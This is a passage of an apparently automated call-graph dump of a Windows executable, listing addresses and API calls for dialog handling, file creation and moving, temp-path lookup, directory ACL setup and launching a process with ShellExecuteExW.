7ff6ca9ec350 25616->25620 25617 7ff6ca9ebeba SendMessageW 25618 7ff6ca9ebec9 25617->25618 25623 7ff6ca9ebed5 SendDlgItemMessageW 25618->25623 25624 7ff6ca9ebef0 GetDlgItem SendMessageW 25618->25624 25619->25616 25950 7ff6ca9c22bc GetDlgItem 25621->25950 25623->25624 26238 7ff6ca9d62dc GetCurrentDirectoryW 25624->26238 25629 7ff6ca9daae0 48 API calls 25625->25629 25631 7ff6ca9eb236 25627->25631 25633 7ff6ca9eb313 SetDlgItemTextW 25629->25633 25630 7ff6ca9eb3b1 25660 7ff6ca9c1fa0 31 API calls 25630->25660 26252 7ff6ca9c1ec4 34 API calls _handle_error 25631->26252 25632 7ff6ca9ebf47 GetDlgItem 26248 7ff6ca9c2520 25632->26248 25636 7ff6ca9eb326 25633->25636 25636->25619 25646 7ff6ca9eb340 GetMessageW 25636->25646 25637 7ff6ca9eb408 GetDlgItem 25640 7ff6ca9eb422 SendMessageW SendMessageW 25637->25640 25641 7ff6ca9eb44f SetFocus 25637->25641 25638 7ff6ca9eb246 25644 7ff6ca9eb25c 25638->25644 25650 7ff6ca9c250c SetDlgItemTextW 25638->25650 25640->25641 25642 7ff6ca9eb465 25641->25642 25643 7ff6ca9eb4f2 25641->25643 25649 7ff6ca9daae0 48 API calls 25642->25649 26253 7ff6ca9c8d04 33 API calls 2 library calls 25643->26253 25644->25619 25662 7ff6ca9ec363 25644->25662 25646->25619 25652 7ff6ca9eb35e IsDialogMessageW 25646->25652 25648 7ff6ca9eb3f5 25648->25630 25655 7ff6ca9daae0 48 API calls 25648->25655 25656 7ff6ca9eb46f 25649->25656 25650->25644 25652->25636 25653 7ff6ca9eb373 TranslateMessage DispatchMessageW 25652->25653 25653->25636 25654 7ff6ca9eb52c 26254 7ff6ca9eef80 33 API calls 2 library calls 25654->26254 25659 7ff6ca9ebcd6 SetDlgItemTextW 25655->25659 25964 7ff6ca9c129c 25656->25964 25664 7ff6ca9daae0 48 API calls 25659->25664 25660->25619 25665 7ff6ca9f7904 _invalid_parameter_noinfo_noreturn 31 API calls 25662->25665 25663 7ff6ca9eb537 25668 7ff6ca9daae0 48 API calls 25663->25668 25669 7ff6ca9ebd08 25664->25669 25671 7ff6ca9ec368 25665->25671 25674 7ff6ca9eb555 25668->25674 25685 7ff6ca9c129c 33 API calls 25669->25685 25681 7ff6ca9f7904 _invalid_parameter_noinfo_noreturn 31 API calls 25671->25681 25678 7ff6ca9dda98 48 API calls 25674->25678 25675 7ff6ca9eb498 25974 7ff6ca9ef0a4 25675->25974 25683 7ff6ca9eb568 25678->25683 25687 7ff6ca9ec36e 25681->25687 25692 7ff6ca9ef0a4 24 API calls 25683->25692 25719 7ff6ca9ebd31 25685->25719 25699 7ff6ca9f7904 _invalid_parameter_noinfo_noreturn 31 API calls 25687->25699 25695 7ff6ca9eb578 25692->25695 25707 7ff6ca9c1fa0 31 API calls 25695->25707 25697 7ff6ca9ebdda 25701 7ff6ca9daae0 48 API calls 25697->25701 25704 7ff6ca9ec374 25699->25704 25700 7ff6ca9eb5ec 25712 7ff6ca9eb61a 25700->25712 25988 7ff6ca9d32a8 25700->25988 25714 7ff6ca9ebde4 25701->25714 25702 7ff6ca9eb4e8 25702->25700 26255 7ff6ca9efa80 33 API calls 2 library calls 25702->26255 25722 7ff6ca9f7904 _invalid_parameter_noinfo_noreturn 31 API calls 25704->25722 25717 7ff6ca9eb586 25707->25717 26008 7ff6ca9d2f58 25712->26008 25736 7ff6ca9c129c 33 API calls 25714->25736 25717->25687 25717->25702 25719->25697 25730 7ff6ca9c129c 33 API calls 25719->25730 25728 7ff6ca9ec37a 25722->25728 25740 7ff6ca9f7904 _invalid_parameter_noinfo_noreturn 31 API calls 25728->25740 25731 7ff6ca9ebd7f 25730->25731 25737 7ff6ca9daae0 48 API calls 25731->25737 25734 7ff6ca9eb634 GetLastError 25735 7ff6ca9eb64c 25734->25735 26020 7ff6ca9d7fc4 25735->26020 25739 7ff6ca9ebe0d 25736->25739 25742 7ff6ca9ebd8a 25737->25742 25752 7ff6ca9c129c 33 API calls 25739->25752 25746 7ff6ca9ec380 25740->25746 25747 7ff6ca9c1150 33 API calls 25742->25747 25753 7ff6ca9f7904 _invalid_parameter_noinfo_noreturn 31 API calls 25746->25753 25755 7ff6ca9ebda2 25747->25755 25748 7ff6ca9eb65e 25750 7ff6ca9eb674 25748->25750 25751 7ff6ca9eb665 GetLastError 25748->25751 25756 7ff6ca9eb71c 25750->25756 25760 7ff6ca9eb72b 25750->25760 25761 7ff6ca9eb68b GetTickCount 25750->25761 25751->25750 25757 7ff6ca9ebe4e 25752->25757 25758 7ff6ca9ec386 25753->25758 26286 7ff6ca9c2034 25755->26286 25756->25760 25777 7ff6ca9ebb79 25756->25777 25773 7ff6ca9c1fa0 31 API calls 25757->25773 25762 7ff6ca9c255c 61 API calls 25758->25762 25764 7ff6ca9eba50 25760->25764 26256 7ff6ca9d6454 25760->26256 26023 7ff6ca9c4228 25761->26023 25767 7ff6ca9ec3e4 25762->25767 25763 7ff6ca9ebdbe 25769 7ff6ca9c1fa0 31 API calls 25763->25769 25764->25630 26280 7ff6ca9cbd0c 33 API calls 25764->26280 25780 7ff6ca9ec489 GetDlgItem SetFocus 25767->25780 25802 7ff6ca9ec3fd 25767->25802 25807 7ff6ca9ec3e8 25767->25807 25774 7ff6ca9ebdcc 25769->25774 25779 7ff6ca9ebe78 25773->25779 25782 7ff6ca9c1fa0 31 API calls 25774->25782 25775 7ff6ca9eb74e 26268 7ff6ca9db914 102 API calls 25775->26268 25791 7ff6ca9daae0 48 API calls 25777->25791 25778 7ff6ca9eba75 26281 7ff6ca9c1150 25778->26281 25787 7ff6ca9c1fa0 31 API calls 25779->25787 25784 7ff6ca9ec4ba 25780->25784 25781 7ff6ca9f2320 _handle_error 8 API calls 25788 7ff6ca9eca97 25781->25788 25782->25697 25797 7ff6ca9c129c 33 API calls 25784->25797 25785 7ff6ca9eb6ba 25790 7ff6ca9c1fa0 31 API calls 25785->25790 25793 7ff6ca9ebe83 25787->25793 25789 7ff6ca9eb768 25796 7ff6ca9dda98 48 API calls 25789->25796 25798 7ff6ca9eb6c8 25790->25798 25799 7ff6ca9ebba7 SetDlgItemTextW 25791->25799 25792 7ff6ca9eba8a 25800 7ff6ca9daae0 48 API calls 25792->25800 25801 7ff6ca9c1fa0 31 API calls 25793->25801 25794 7ff6ca9ec434 SendDlgItemMessageW 25794->25807 25803 7ff6ca9eb7aa GetCommandLineW 25796->25803 25804 7ff6ca9ec4cc 25797->25804 26033 7ff6ca9d2134 25798->26033 25805 7ff6ca9c2534 25799->25805 25806 7ff6ca9eba97 25800->25806 25801->25630 25802->25794 25802->25807 25808 7ff6ca9eb84f 25803->25808 25809 7ff6ca9eb869 25803->25809 26290 7ff6ca9d80d8 33 API calls 25804->26290 25811 7ff6ca9ebbc5 SetDlgItemTextW GetDlgItem 25805->25811 25812 7ff6ca9c1150 33 API calls 25806->25812 25807->25781 26269 7ff6ca9c20b0 25808->26269 26273 7ff6ca9eab54 33 API calls _handle_error 25809->26273 25817 7ff6ca9ebc13 25811->25817 25818 7ff6ca9ebbf0 GetWindowLongPtrW SetWindowLongPtrW 25811->25818 25813 7ff6ca9ebaaa 25812->25813 25819 7ff6ca9c1fa0 31 API calls 25813->25819 25815 7ff6ca9ec4e0 25822 7ff6ca9c250c SetDlgItemTextW 25815->25822 26053 7ff6ca9ece88 25817->26053 25818->25817 25826 7ff6ca9ebab5 25819->25826 25821 7ff6ca9eb87a 26274 7ff6ca9eab54 33 API calls _handle_error 25821->26274 25830 7ff6ca9ec4f4 25822->25830 25824 7ff6ca9eb704 26049 7ff6ca9d204c 25824->26049 25825 7ff6ca9eb6f5 GetLastError 25825->25824 25832 7ff6ca9c1fa0 31 API calls 25826->25832 25839 7ff6ca9ec526 SendDlgItemMessageW FindFirstFileW 25830->25839 25836 7ff6ca9ebac3 25832->25836 25833 7ff6ca9ece88 160 API calls 25837 7ff6ca9ebc3c 25833->25837 25834 7ff6ca9eb88b 26275 7ff6ca9eab54 33 API calls _handle_error 25834->26275 25847 7ff6ca9daae0 48 API calls 25836->25847 26204 7ff6ca9ef974 25837->26204 25843 7ff6ca9ec57b 25839->25843 25935 7ff6ca9eca04 25839->25935 25842 7ff6ca9eb89c 26276 7ff6ca9db9b4 102 API calls 25842->26276 25853 7ff6ca9daae0 48 API calls 25843->25853 25846 7ff6ca9eca81 25846->25807 25851 7ff6ca9ebadb 25847->25851 25848 7ff6ca9ece88 160 API calls 25864 7ff6ca9ebc6a 25848->25864 25849 7ff6ca9eb8b3 26277 7ff6ca9efbdc 33 API calls 25849->26277 25850 7ff6ca9ecaa9 25854 7ff6ca9f7904 _invalid_parameter_noinfo_noreturn 31 API calls 25850->25854 25863 7ff6ca9c129c 33 API calls 25851->25863 25857 7ff6ca9ec59e 25853->25857 25858 7ff6ca9ecaae 25854->25858 25855 7ff6ca9ebc96 26285 7ff6ca9c2298 GetDlgItem EnableWindow 25855->26285 25856 7ff6ca9eb8d2 CreateFileMappingW 25860 7ff6ca9eb953 ShellExecuteExW 25856->25860 25861 7ff6ca9eb911 MapViewOfFile 25856->25861 25865 7ff6ca9c129c 33 API calls 25857->25865 25866 7ff6ca9f7904 _invalid_parameter_noinfo_noreturn 31 API calls 25858->25866 25871 7ff6ca9eb974 25860->25871 26278 7ff6ca9f3640 25861->26278 25877 7ff6ca9ebb04 25863->25877 25864->25855 25867 7ff6ca9ece88 160 API calls 25864->25867 25868 7ff6ca9ec5cd 25865->25868 25869 7ff6ca9ecab4 25866->25869 25867->25855 25870 7ff6ca9c1150 33 API calls 25868->25870 25875 7ff6ca9f7904 _invalid_parameter_noinfo_noreturn 31 API calls 25869->25875 25872 7ff6ca9ec5e8 25870->25872 25873 7ff6ca9eb9c3 25871->25873 25874 7ff6ca9eb996 WaitForInputIdle 25871->25874 26291 7ff6ca9ce164 25872->26291 25884 7ff6ca9eb9ef 25873->25884 25885 7ff6ca9eb9dc UnmapViewOfFile CloseHandle 25873->25885 25879 7ff6ca9eb9ab 25874->25879 25880 7ff6ca9ecaba 25875->25880 25876 7ff6ca9ebb5a 25881 7ff6ca9c1fa0 31 API calls 25876->25881 25877->25728 25877->25876 25879->25873 25883 7ff6ca9eb9b1 Sleep 25879->25883 25888 7ff6ca9f7904 _invalid_parameter_noinfo_noreturn 31 API calls 25880->25888 25881->25630 25882 7ff6ca9ec5ff 25886 7ff6ca9c1fa0 31 API calls 25882->25886 25883->25873 25883->25879 25884->25704 25887 7ff6ca9eba25 25884->25887 25885->25884 25889 7ff6ca9ec60c 25886->25889 25891 7ff6ca9c1fa0 31 API calls 25887->25891 25890 7ff6ca9ecac0 25888->25890 25889->25858 25893 7ff6ca9c1fa0 31 API calls 25889->25893 25894 7ff6ca9f7904 _invalid_parameter_noinfo_noreturn 31 API calls 25890->25894 25892 7ff6ca9eba42 25891->25892 25895 7ff6ca9c1fa0 31 API calls 25892->25895 25896 7ff6ca9ec673 25893->25896 25897 7ff6ca9ecac6 25894->25897 25895->25764 25898 7ff6ca9c250c SetDlgItemTextW 25896->25898 25900 7ff6ca9f7904 _invalid_parameter_noinfo_noreturn 31 API calls 25897->25900 25899 7ff6ca9ec687 FindClose 25898->25899 25901 7ff6ca9ec6a3 25899->25901 25902 7ff6ca9ec797 SendDlgItemMessageW 25899->25902 25903 7ff6ca9ecacc 25900->25903 26301 7ff6ca9ea2cc 10 API calls _handle_error 25901->26301 25904 7ff6ca9ec7cb 25902->25904 25907 7ff6ca9daae0 48 API calls 25904->25907 25906 7ff6ca9ec6c6 25908 7ff6ca9daae0 48 API calls 25906->25908 25909 7ff6ca9ec7d8 25907->25909 25910 7ff6ca9ec6cf 25908->25910 25912 7ff6ca9c129c 33 API calls 25909->25912 25911 7ff6ca9dda98 48 API calls 25910->25911 25915 7ff6ca9ec6ec BuildCatchObjectHelperInternal 25911->25915 25914 7ff6ca9ec807 25912->25914 25913 7ff6ca9c1fa0 31 API calls 25916 7ff6ca9ec783 25913->25916 25917 7ff6ca9c1150 33 API calls 25914->25917 25915->25869 25915->25913 25918 7ff6ca9c250c SetDlgItemTextW 25916->25918 25919 7ff6ca9ec822 25917->25919 25918->25902 25920 7ff6ca9ce164 33 API calls 25919->25920 25921 7ff6ca9ec839 25920->25921 25922 7ff6ca9c1fa0 31 API calls 25921->25922 25923 7ff6ca9ec845 BuildCatchObjectHelperInternal 25922->25923 25924 7ff6ca9c1fa0 31 API calls 25923->25924 25925 7ff6ca9ec87f 25924->25925 25926 7ff6ca9c1fa0 31 API calls 25925->25926 25927 7ff6ca9ec88c 25926->25927 25927->25880 25928 7ff6ca9c1fa0 31 API calls 25927->25928 25929 7ff6ca9ec8f3 25928->25929 25930 7ff6ca9c250c SetDlgItemTextW 25929->25930 25931 7ff6ca9ec907 25930->25931 25931->25935 26302 7ff6ca9ea2cc 10 API calls _handle_error 25931->26302 25933 7ff6ca9ec932 25934 7ff6ca9daae0 48 API calls 25933->25934 25936 7ff6ca9ec93c 25934->25936 25935->25807 25935->25846 25935->25850 25935->25897 25937 7ff6ca9dda98 48 API calls 25936->25937 25939 7ff6ca9ec959 BuildCatchObjectHelperInternal 25937->25939 25938 7ff6ca9c1fa0 31 API calls 25940 7ff6ca9ec9f0 25938->25940 25939->25890 25939->25938 25941 7ff6ca9c250c SetDlgItemTextW 25940->25941 25941->25935 25943 7ff6ca9c25d0 25942->25943 25944 7ff6ca9c256a 25942->25944 25943->25609 25944->25943 26303 7ff6ca9da4ac 25944->26303 25946 7ff6ca9c258f 25946->25943 25947 7ff6ca9c25a4 GetDlgItem 25946->25947 25947->25943 25948 7ff6ca9c25b7 25947->25948 25948->25943 25949 7ff6ca9c25be SetWindowTextW 25948->25949 25949->25943 25951 7ff6ca9c2334 25950->25951 25952 7ff6ca9c22fc 25950->25952 26356 7ff6ca9c23f8 GetWindowTextLengthW 25951->26356 25955 7ff6ca9c129c 33 API calls 25952->25955 25954 7ff6ca9c232a BuildCatchObjectHelperInternal 25956 7ff6ca9c1fa0 31 API calls 25954->25956 25960 7ff6ca9c2389 25954->25960 25955->25954 25956->25960 25957 7ff6ca9c23c8 25958 7ff6ca9f2320 _handle_error 8 API calls 25957->25958 25959 7ff6ca9c23dd 25958->25959 25959->25630 25959->25637 25959->25648 25960->25957 25961 7ff6ca9c23f0 25960->25961 25962 7ff6ca9f7904 _invalid_parameter_noinfo_noreturn 31 API calls 25961->25962 25963 7ff6ca9c23f5 25962->25963 25965 7ff6ca9c12d0 25964->25965 25966 7ff6ca9c139b 25964->25966 25969 7ff6ca9c1338 25965->25969 25970 7ff6ca9c1396 25965->25970 25973 7ff6ca9c12de BuildCatchObjectHelperInternal 25965->25973 26381 7ff6ca9c2004 33 API calls std::_Xinvalid_argument 25966->26381 25972 7ff6ca9f21d0 33 API calls 25969->25972 25969->25973 26380 7ff6ca9c1f80 33 API calls 3 library calls 25970->26380 25972->25973 25973->25675 26382 7ff6ca9eae1c PeekMessageW 25974->26382 25977 7ff6ca9ef0f5 25981 7ff6ca9ef101 ShowWindow SendMessageW SendMessageW 25977->25981 25978 7ff6ca9ef143 SendMessageW SendMessageW 25979 7ff6ca9ef1a4 SendMessageW 25978->25979 25980 7ff6ca9ef189 25978->25980 25982 7ff6ca9ef1c3 25979->25982 25983 7ff6ca9ef1c6 SendMessageW SendMessageW 25979->25983 25980->25979 25981->25978 25982->25983 25984 7ff6ca9ef1f3 SendMessageW 25983->25984 25985 7ff6ca9ef218 SendMessageW 25983->25985 25984->25985 25986 7ff6ca9f2320 _handle_error 8 API calls 25985->25986 25987 7ff6ca9eb4a5 25986->25987 25987->25671 25987->25702 26387 7ff6ca9d32bc 25988->26387 25991 7ff6ca9e9d90 GetCurrentProcess OpenProcessToken 25992 7ff6ca9e9ddd GetTokenInformation 25991->25992 25993 7ff6ca9e9e47 25991->25993 25994 7ff6ca9e9e08 GetLastError 25992->25994 25995 7ff6ca9e9e17 25992->25995 25996 7ff6ca9f2320 _handle_error 8 API calls 25993->25996 25994->25993 25994->25995 25998 7ff6ca9e9e20 GetTokenInformation 25995->25998 25997 7ff6ca9e9f32 25996->25997 25997->25712 25998->25993 25999 7ff6ca9e9e54 CopySid 25998->25999 26000 7ff6ca9fa260 25999->26000 26001 7ff6ca9e9e6e SetEntriesInAclW 26000->26001 26001->25993 26002 7ff6ca9e9ebe InitializeSecurityDescriptor 26001->26002 26003 7ff6ca9e9ecf SetSecurityDescriptorDacl 26002->26003 26004 7ff6ca9e9f16 26002->26004 26003->26004 26005 7ff6ca9e9ee8 CreateDirectoryW 26003->26005 26004->25993 26006 7ff6ca9e9f20 LocalFree 26004->26006 26005->26004 26006->25993 26009 7ff6ca9d309d 26008->26009 26016 7ff6ca9d2f8e 26008->26016 26010 7ff6ca9f2320 _handle_error 8 API calls 26009->26010 26011 7ff6ca9d30b3 26010->26011 26011->25734 26011->25735 26012 7ff6ca9d3077 26012->26009 26013 7ff6ca9d3684 56 API calls 26012->26013 26013->26009 26014 7ff6ca9c129c 33 API calls 26014->26016 26016->26012 26016->26014 26017 7ff6ca9d30c8 26016->26017 26499 7ff6ca9d3684 26016->26499 26018 7ff6ca9f7904 _invalid_parameter_noinfo_noreturn 31 API calls 26017->26018 26019 7ff6ca9d30cd 26018->26019 26021 7ff6ca9d7fd2 SetCurrentDirectoryW 26020->26021 26022 7ff6ca9d7fcf 26020->26022 26021->25748 26022->26021 26024 7ff6ca9c4255 26023->26024 26025 7ff6ca9c426a 26024->26025 26026 7ff6ca9c129c 33 API calls 26024->26026 26027 7ff6ca9f2320 _handle_error 8 API calls 26025->26027 26026->26025 26028 7ff6ca9c42a1 26027->26028 26029 7ff6ca9c3c84 26028->26029 26030 7ff6ca9c3cab 26029->26030 26533 7ff6ca9c710c 26030->26533 26032 7ff6ca9c3cbb BuildCatchObjectHelperInternal 26032->25785 26035 7ff6ca9d216a 26033->26035 26034 7ff6ca9d219e 26038 7ff6ca9d6a0c 49 API calls 26034->26038 26045 7ff6ca9d227f 26034->26045 26035->26034 26036 7ff6ca9d21b1 CreateFileW 26035->26036 26036->26034 26037 7ff6ca9d22af 26039 7ff6ca9f2320 _handle_error 8 API calls 26037->26039 26040 7ff6ca9d2209 26038->26040 26042 7ff6ca9d22c4 26039->26042 26043 7ff6ca9d220d CreateFileW 26040->26043 26044 7ff6ca9d2246 26040->26044 26041 7ff6ca9c20b0 33 API calls 26041->26037 26042->25824 26042->25825 26043->26044 26044->26045 26046 7ff6ca9d22d8 26044->26046 26045->26037 26045->26041 26047 7ff6ca9f7904 _invalid_parameter_noinfo_noreturn 31 API calls 26046->26047 26048 7ff6ca9d22dd 26047->26048 26050 7ff6ca9d2066 26049->26050 26051 7ff6ca9d2072 26049->26051 26050->26051 26545 7ff6ca9d20d0 26050->26545 26552 7ff6ca9eaa08 26053->26552 26055 7ff6ca9ed1ee 26056 7ff6ca9c1fa0 31 API calls 26055->26056 26057 7ff6ca9ed1f7 26056->26057 26059 7ff6ca9f2320 _handle_error 8 API calls 26057->26059 26058 7ff6ca9dd22c 33 API calls 26197 7ff6ca9ecf03 BuildCatchObjectHelperInternal 26058->26197 26060 7ff6ca9ebc2b 26059->26060 26060->25833 26061 7ff6ca9eeefa 26650 7ff6ca9c704c 47 API calls BuildCatchObjectHelperInternal 26061->26650 26064 7ff6ca9eef00 26651 7ff6ca9c704c 47 API calls BuildCatchObjectHelperInternal 26064->26651 26066 7ff6ca9eef06 26070 7ff6ca9f7904 _invalid_parameter_noinfo_noreturn 31 API calls 26066->26070 26068 7ff6ca9eeeee 26069 7ff6ca9f7904 _invalid_parameter_noinfo_noreturn 31 API calls 26068->26069 26071 7ff6ca9eeef4 26069->26071 26072 7ff6ca9eef0c 26070->26072 26649 7ff6ca9c704c 47 API calls BuildCatchObjectHelperInternal 26071->26649 26075 7ff6ca9f7904 _invalid_parameter_noinfo_noreturn 31 API calls 26072->26075 26077 7ff6ca9eef12 26075->26077 26076 7ff6ca9eee4a 26078 7ff6ca9eeed2 26076->26078 26079 7ff6ca9c20b0 33 API calls 26076->26079 26082 7ff6ca9f7904 _invalid_parameter_noinfo_noreturn 31 API calls 26077->26082 26647 7ff6ca9c1f80 33 API calls 3 library calls 26078->26647 26084 7ff6ca9eee77 26079->26084 26080 7ff6ca9c13a4 33 API calls 26085 7ff6ca9edc3a GetTempPathW 26080->26085 26081 7ff6ca9eeee8 26648 7ff6ca9c2004 33 API calls std::_Xinvalid_argument 26081->26648 26087 7ff6ca9eef18 26082->26087 26646 7ff6ca9eabe8 33 API calls 3 library calls 26084->26646 26085->26197 26086 7ff6ca9d62dc 35 API calls 26086->26197 26095 7ff6ca9f7904 _invalid_parameter_noinfo_noreturn 31 API calls 26087->26095 26090 7ff6ca9fbb8c 43 API calls 26090->26197 26092 7ff6ca9eee8d 26101 7ff6ca9c1fa0 31 API calls 26092->26101 26105 7ff6ca9eeea4 BuildCatchObjectHelperInternal 26092->26105 26093 7ff6ca9c2520 SetWindowTextW 26093->26197 26098 7ff6ca9eef1e 26095->26098 26096 7ff6ca9c8d04 33 API calls 26096->26197 26103 7ff6ca9f7904 _invalid_parameter_noinfo_noreturn 31 API calls 26098->26103 26099 7ff6ca9c2034 33 API calls 26099->26197 26100 7ff6ca9ee7f3 26100->26078 26100->26081 26104 7ff6ca9f21d0 33 API calls 26100->26104 26113 7ff6ca9ee83b BuildCatchObjectHelperInternal 26100->26113 26101->26105 26102 7ff6ca9c1fa0 31 API calls 26102->26078 26107 7ff6ca9eef24 26103->26107 26104->26113 26105->26102 26112 7ff6ca9f7904 _invalid_parameter_noinfo_noreturn 31 API calls 26107->26112 26108 7ff6ca9c20b0 33 API calls 26108->26197 26109 7ff6ca9eaa08 33 API calls 26109->26197 26110 7ff6ca9eef6c 26654 7ff6ca9c2004 33 API calls std::_Xinvalid_argument 26110->26654 26111 7ff6ca9d3f30 54 API calls 26111->26197 26117 7ff6ca9eef2a 26112->26117 26123 7ff6ca9c20b0 33 API calls 26113->26123 26164 7ff6ca9eeb8f 26113->26164 26115 7ff6ca9c1fa0 31 API calls 26115->26076 26116 7ff6ca9eef78 26656 7ff6ca9c2004 33 API calls std::_Xinvalid_argument 26116->26656 26129 7ff6ca9f7904 _invalid_parameter_noinfo_noreturn 31 API calls 26117->26129 26118 7ff6ca9eef72 26655 7ff6ca9c1f80 33 API calls 3 library calls 26118->26655 26119 7ff6ca9c20b0 33 API calls 26200 7ff6ca9ed489 26119->26200 26121 7ff6ca9d5820 33 API calls 26121->26197 26122 7ff6ca9eef66 26653 7ff6ca9c1f80 33 API calls 3 library calls 26122->26653 26130 7ff6ca9ee963 26123->26130 26125 7ff6ca9c1fa0 31 API calls 26125->26197 26128 7ff6ca9eec2a 26128->26110 26128->26122 26137 7ff6ca9eec72 BuildCatchObjectHelperInternal 26128->26137 26143 7ff6ca9eed3b BuildCatchObjectHelperInternal 26128->26143 26145 7ff6ca9f21d0 33 API calls 26128->26145 26135 7ff6ca9eef30 26129->26135 26136 7ff6ca9eef60 26130->26136 26144 7ff6ca9c129c 33 API calls 26130->26144 26133 7ff6ca9eed40 26133->26116 26133->26118 26133->26143 26148 7ff6ca9f21d0 33 API calls 26133->26148 26134 7ff6ca9d3d34 51 API calls 26134->26197 26149 7ff6ca9f7904 _invalid_parameter_noinfo_noreturn 31 API calls 26135->26149 26652 7ff6ca9c704c 47 API calls BuildCatchObjectHelperInternal 26136->26652 26557 7ff6ca9ef4e0 26137->26557 26139 7ff6ca9ed5e9 GetDlgItem 26146 7ff6ca9c2520 SetWindowTextW 26139->26146 26141 7ff6ca9e99c8 31 API calls 26141->26197 26143->26115 26150 7ff6ca9ee9a6 26144->26150 26145->26137 26151 7ff6ca9ed608 SendMessageW 26146->26151 26148->26143 26154 7ff6ca9eef36 26149->26154 26642 7ff6ca9dd22c 26150->26642 26151->26200 26152 7ff6ca9ddc2c 33 API calls 26152->26197 26160 7ff6ca9f7904 _invalid_parameter_noinfo_noreturn 31 API calls 26154->26160 26156 7ff6ca9d5b60 53 API calls 26156->26197 26157 7ff6ca9d32bc 51 API calls 26157->26197 26158 7ff6ca9c2674 31 API calls 26158->26197 26159 7ff6ca9d5aa8 33 API calls 26159->26197 26163 7ff6ca9eef3c 26160->26163 26161 7ff6ca9ed63c SendMessageW 26161->26200 26168 7ff6ca9f7904 _invalid_parameter_noinfo_noreturn 31 API calls 26163->26168 26164->26128 26164->26133 26169 7ff6ca9eef54 26164->26169 26171 7ff6ca9eef5a 26164->26171 26170 7ff6ca9eef42 26168->26170 26172 7ff6ca9f7904 _invalid_parameter_noinfo_noreturn 31 API calls 26169->26172 26176 7ff6ca9f7904 _invalid_parameter_noinfo_noreturn 31 API calls 26170->26176 26175 7ff6ca9f7904 _invalid_parameter_noinfo_noreturn 31 API calls 26171->26175 26172->26171 26173 7ff6ca9c4228 33 API calls 26173->26197 26175->26136 26178 7ff6ca9eef48 26176->26178 26177 7ff6ca9d32a8 51 API calls 26177->26197 26180 7ff6ca9f7904 _invalid_parameter_noinfo_noreturn 31 API calls 26178->26180 26179 7ff6ca9ce164 33 API calls 26179->26197 26182 7ff6ca9eef4e 26180->26182 26181 7ff6ca9c250c SetDlgItemTextW 26181->26197 26187 7ff6ca9f7904 _invalid_parameter_noinfo_noreturn 31 API calls 26182->26187 26183 7ff6ca9c129c 33 API calls 26194 7ff6ca9ee9d1 26183->26194 26185 7ff6ca9c1150 33 API calls 26185->26197 26187->26169 26188 7ff6ca9e13c4 CompareStringW 26188->26194 26190 7ff6ca9c1fa0 31 API calls 26190->26194 26191 7ff6ca9c129c 33 API calls 26191->26197 26194->26164 26194->26178 26194->26182 26194->26183 26194->26188 26194->26190 26196 7ff6ca9dd22c 33 API calls 26194->26196 26196->26194 26197->26055 26197->26058 26197->26061 26197->26064 26197->26068 26197->26071 26197->26072 26197->26076 26197->26077 26197->26080 26197->26086 26197->26087 26197->26090 26197->26093 26197->26096 26197->26098 26197->26099 26197->26100 26197->26107 26197->26108 26197->26109 26197->26111 26197->26117 26197->26121 26197->26125 26197->26134 26197->26135 26197->26141 26197->26152 26197->26154 26197->26156 26197->26157 26197->26158 26197->26159 26197->26163 26197->26170 26197->26173 26197->26177 26197->26179 26197->26181 26197->26185 26197->26191 26198 7ff6ca9edb21 MoveFileW 26197->26198 26197->26200 26202 7ff6ca9d2f58 56 API calls 26197->26202 26556 7ff6ca9e13c4 CompareStringW 26197->26556 26596 7ff6ca9dcfa4 35 API calls _invalid_parameter_noinfo_noreturn 26197->26596 26597 7ff6ca9e95b4 33 API calls Concurrency::cancel_current_task 26197->26597 26598 7ff6ca9f0684 31 API calls _invalid_parameter_noinfo_noreturn 26197->26598 26600 7ff6ca9ea834 33 API calls _invalid_parameter_noinfo_noreturn 26197->26600 26601 7ff6ca9e9518 33 API calls 26197->26601 26604 7ff6ca9eabe8 33 API calls 3 library calls 26197->26604 26605 7ff6ca9d7368 33 API calls 2 library calls 26197->26605 26606 7ff6ca9d4088 33 API calls 26197->26606 26607 7ff6ca9d65b0 33 API calls 3 library calls 26197->26607 26608 7ff6ca9d72cc 26197->26608 26612 7ff6ca9c1744 33 API calls 4 library calls 26197->26612 26613 7ff6ca9d31bc 26197->26613 26627 7ff6ca9d3ea0 FindClose 26197->26627 26628 7ff6ca9e13f4 CompareStringW 26197->26628 26629 7ff6ca9e9cd0 47 API calls 26197->26629 26630 7ff6ca9e87d8 51 API calls 3 library calls 26197->26630 26631 7ff6ca9eab54 33 API calls _handle_error 26197->26631 26632 7ff6ca9d7df4 26197->26632 26640 7ff6ca9d5b08 CompareStringW 26197->26640 26641 7ff6ca9d7eb0 47 API calls 26197->26641 26199 7ff6ca9edb55 MoveFileExW 26198->26199 26198->26200 26199->26200 26200->26066 26200->26119 26200->26161 26200->26197 26201 7ff6ca9c1fa0 31 API calls 26200->26201 26599 7ff6ca9cdf4c 47 API calls BuildCatchObjectHelperInternal 26200->26599 26602 7ff6ca9c2674 31 API calls _invalid_parameter_noinfo_noreturn 26200->26602 26603 7ff6ca9ea440 115 API calls 2 library calls 26200->26603 26201->26200 26202->26197 26205 7ff6ca9ef9a3 26204->26205 26206 7ff6ca9c20b0 33 API calls 26205->26206 26207 7ff6ca9ef9b9 26206->26207 26208 7ff6ca9ef9ee 26207->26208 26209 7ff6ca9c20b0 33 API calls 26207->26209 26672 7ff6ca9ce34c 26208->26672 26209->26208 26211 7ff6ca9efa4b 26692 7ff6ca9ce7a8 26211->26692 26215 7ff6ca9efa61 26216 7ff6ca9f2320 _handle_error 8 API calls 26215->26216 26217 7ff6ca9ebc52 26216->26217 26217->25848 27853 7ff6ca9e849c 26218->27853 26221 7ff6ca9ef4b7 26223 7ff6ca9f2320 _handle_error 8 API calls 26221->26223 26222 7ff6ca9ef3c7 GetWindow 26227 7ff6ca9ef3e2 26222->26227 26224 7ff6ca9ebe9b 26223->26224 26224->25617 26224->25618 26225 7ff6ca9ef3ee GetClassNameW 27858 7ff6ca9e13c4 CompareStringW 26225->27858 26227->26221 26227->26225 26228 7ff6ca9ef496 GetWindow 26227->26228 26229 7ff6ca9ef417 GetWindowLongPtrW 26227->26229 26228->26221 26228->26227 26229->26228 26230 7ff6ca9ef429 SendMessageW 26229->26230 26230->26228 26231 7ff6ca9ef445 GetObjectW 26230->26231 27859 7ff6ca9e8504 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 26231->27859 26234 7ff6ca9ef461 27860 7ff6ca9e84cc 26234->27860 27864 7ff6ca9e8df4 15 API calls _handle_error 26234->27864 26236 7ff6ca9ef479 SendMessageW 27865 7ff6caa2e0f0 26236->27865 26239 7ff6ca9d6300 26238->26239 